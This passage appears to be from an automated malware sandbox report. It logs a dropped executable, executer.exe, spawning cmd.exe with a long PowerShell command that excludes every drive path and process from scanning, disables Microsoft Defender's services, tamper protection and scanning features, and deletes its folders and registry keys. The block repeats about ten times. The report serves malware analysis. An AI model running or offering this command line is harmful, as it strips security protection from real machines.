"HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty 